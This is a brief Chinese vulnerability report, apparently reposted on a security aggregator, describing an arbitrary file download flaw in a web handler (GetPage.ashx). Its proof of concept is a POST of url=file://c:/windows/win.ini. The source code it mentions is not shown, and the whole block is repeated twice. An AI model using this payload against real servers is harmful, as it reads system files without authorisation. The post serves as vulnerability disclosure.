漏洞作者: hello
详细说明:
地址
主要源码如下
如果url为file://url 就可以下载任意文件了
漏洞证明:
(登陆可见是小编测试一下功能而已啦~嘿嘿~)
[dmengl2v]
漏洞证明
官网
访问
http://demo_htmdata_com/ashx/GetPage.ashx
post提交
url=file://c:/windows/win.ini
[/dmengl2v]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
地址
主要源码如下
如果url为file://url 就可以下载任意文件了
(登陆可见是小编测试一下功能而已啦~嘿嘿~)
[dmengl2v]
漏洞证明
官网
访问
http://demo_htmdata_com/ashx/GetPage.ashx
post提交
url=file://c:/windows/win.ini
[/dmengl2v]
评论